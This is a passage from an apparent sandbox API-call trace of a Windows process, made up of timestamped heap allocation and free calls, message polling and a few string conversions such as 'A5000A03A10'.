[0266.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0266.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.694] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0266.695] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0266.696] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a2090 [0266.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0266.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x34a20c0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0266.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0266.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.701] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0266.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0266.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0266.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0266.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a2080 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0266.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0266.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0266.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.704] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0266.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1438 [0266.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0266.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0266.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x34a20c0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0266.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a20b0 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.709] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0266.709] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: 